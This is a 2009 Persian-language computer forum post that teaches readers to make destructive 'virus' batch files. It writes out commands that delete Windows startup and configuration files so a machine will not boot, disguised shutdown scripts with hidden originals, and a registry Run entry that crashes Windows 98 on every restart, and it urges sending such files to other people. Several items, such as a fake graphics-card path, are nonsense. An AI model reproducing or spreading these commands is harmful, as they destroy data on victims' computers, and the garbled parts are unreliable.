انجمن کامپیوتر دانشگاه ولی عصر رفسنجان
برای استفاده کامل از امکانات انجمن می بایست به انجمن وارد شوید، اگر هنوز عضو انجمن نیستید دکمه ثبت نام را فشار داده و در غیر اینصورت دکمه ورود را برای وارد شدن به حساب کاربری خود فشار دهید.
اخبار فناوری اطلاعات
RSS feeds


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 


Social bookmarking

Social bookmarking delicious  Social bookmarking reddit  Social bookmarking stumbleupon  Social bookmarking slashdot  Social bookmarking yahoo  Social bookmarking google  Social bookmarking blogmarks  Social bookmarking live      

Bookmark and share the address of انجمن کامپیوتر دانشگاه ولی عصر رفسنجان on your social bookmarking website

آموزش ساخت یک ویروس که اگر اجرا بشه پس از ریست ، کامپیوتر دیگه بالا نمیاد.

Go down

نظرتون چیه؟

0% 0% 
[ 0 ]
0% 0% 
[ 0 ]
0% 0% 
[ 0 ]
0% 0% 
[ 0 ]
 
Total Votes : 0

آموزش ساخت یک ویروس که اگر اجرا بشه پس از ریست ، کامپیوتر دیگه بالا نمیاد.

Post by Ù…حمدعلی احمدی on 24/6/2009, 7:37 am

خوب اول یک

Notepad یا همان Txt Document

باز می کنید بعد دستور زیر را توی اون کپی میکنید و با فرمت

Bat

سیو میکنید...

C:

del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini

مثل:

Virus.bat

به جای کلمه ویروس هم اسم مورد نظر را بگذارید...

**************************************************

آموزش ساخت ویروس های قوی و کشنده .

1=ویروس خطرناک

cpu-567njkblaster بعد با پسوند bat. سیو کنید.
خطر: یک بار هم روی سیستم خودتون امتحان نکنید.
ویروس graphic card lower :
توضیح در باره ویروس: این ویروس فضای کارت گرافیک رو پر میکنه و دیگه هیچ بازی رو سیستم اجرا نمیشه. نت پد رو باز کنید و در آن تایپ کنید :
c/windows/system32/jefo/display/memory/full
و برای save کردنش گزینه file رو زده و save as... رو انتخاب کنید و اونو با اسم XXX.bat ذخیره کنید اکنون ویروس شما آماده میباشد

________________________________________
2=ساخت ویروس
فکر می کنم همه شما ویروس Blaster رو بشناسید (ویروسی که باعث Shutdown شدن کامپیوتر تو 60 ثانیه می شد و می شه) و حتی خیلی از شما روش ساخت اون را بدونید ولی لازم میدونم نگاهی سریع به اون بندازم.
این ویروس رو به طریق مختلفی و با دستورات گوناگونی می شه نوشت که در این جا دو روش رو مورد بررسی قرار میدیم
اگر از این دستورات از قبل آشنایی ندارید حتما از Copy/Paste استفاده کنید.
روش اول
با استفاده از Shortcut : در جایی از دسکتاپ خود کلیک راست کنید و در بخش New گزینه Shortcut را انتخاب کنید و در بخش ظاهر شده یکی از دستورات زیر را وارد کنید:
1)shutdown -s -t xx
2)%windir%system32shutdown.exe -s -t xx
توضیح: بعد از اینکه Paste کردید به جای xx در دستورات بالا مدت زمانی را بر حسب ثانیه قرار دهید تا کامپیوتر پس از آن زمان خاموش شود.
سپس Next را بزنید و برای فایل خود یک نام برگزینید و کار تمام است.
روش دوم
به کمک Notepad : نت پد را باز کنید و باز هم یکی از دو دستور بالا را در آن Paste کنید و حالا فایل خود را با پسوند bat یعنی با نامی مثل shutdown.bat سیو کنید. برای پادزهر درست کردن برای این ویروس هم میتوانید از دستور زیر استفاده کنید:
shutdown -a
و همه مراحل قبل را انجام دهید.این دستور هم از هر دو راه فوق قابل اجرا است. حالا میرسیم به نکات تکمیلی در مورد چگونه میتوان برای BatchFile ها آیکون انتخاب کرد. باید بگویم یکی از ساده ترین روشها که به هیچ نرم افزار خاصی نیاز ندارد این است که شما از BatchFile مورد نظر یک Shortcut بسازید و برای Shortcut براحتی آیکون انتخاب کنید و فایل اصلی را Hidden کنید.
تا به حال هیچ به این فکر افتاده اید که اگر در کامپیوتری Notepad و Wordpad و Microsoft Word نصب نشده باشد شما این همه ترفند را کجا میخواهید پیاده کنید. آیا میدانید هکرها معمولا در محیط متنی دیگری بجز اینها اقدام به نوشن برنامه میکنند؟ بله این محیط متنی به نسبت ناشناخته همان ادیتور داس (Dos Editor) است. شما در این ادیتور میتوانید کد برنامه ها را ببینید. برای وارد شدن به این محیط وارد داس شوید و تایپ کنید Edit. صبر کنید. قبل از اینکه وارد این محیط شوید باید بدانید بر خلاف محیط بی آزار نت پد محیط Dos Editor بسیار بسیار خطرناک است. هرگونه تغییری که خواسته یا ناخواسته در متن کد ها بوجود آورید امکان هیچگونه بازگشت ندارد (اینجا از کلیدی به نام Undo خبری نیست.) همچنین همه تغییرات بطور خودکار سیو میشود و هیچگاه موقع خروج از ادیتور ازشما سوال نمیشود که Do you want to save changes و همه چیز بطور خودکار ذخیره شده و اگر احیانا کد فایل های اصلی سیستم را دستکاری کنید حتی System Restore و Backup های رجیستری هم به دادتان نخواهند رسید

________________________________________
شبه ویروس
اگه ویندوز 98 دارید برید تو Run و تایپ کنید Con/Con : چیزى که مشاهده خواهید کرد همون صفحه آبى رنگ ویندوز! هیچ چاره اى جر restart کردن رو براتون باقى نمی گذاره.حالا چه جورى می تونیم از این باگ که در ویندوز98 موجود است استفاده کنیم.یکى از راهاش اینه که در یک صفحه اینترنت این دستور را وارد کنیم که این فایل را از کامپیوتر فراخوانى کند بدین صورت file:///c:/con/con می توانید از این باگ یه فایل درست کنید که وقتى کسى این فایل رو اجرا کرد هر بار که کامپیوترش این فایل فراخوانى بشه و راهى بجز فرمت رو براش پیش رو نگذاره یه صفحه یtxt باز کنید و این دستورات رو توش بنویسید و با پسوند .REG سیو کنید
windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\Curr entVersion\Run]
@="c:\\con\\con"
این باعث میشه که باهر بار ریستارت کردن کامپیوتر این دستور اجرا بشه و نهایتا همون صفحه آبى رنگ بیاد که راهى جز restart کردن نداره.اگر ویندوز NT /200 / XP می توانید یه کار دیگه بکنید یه صفحه یtxt ‌‌باز کنید بعد این کامند ها رو بتوش بنویسید
c:
del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
بعد فایل رو با پسوند .BAT سیو کنید. این فایل رو وقتى براى کسى بفرستید هیچى نمی شه اما به محض اینکه کامپیوتر رو restart کنه دیگه بار بعدی بالا نمیاد.

محمدعلی احمدی
عضو انجمن
عضو انجمن

تعداد پستها : 25
اعتبار : 0
Join date : 2009-06-22
Age : 28

http://www.virus87.persianblog.ir

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum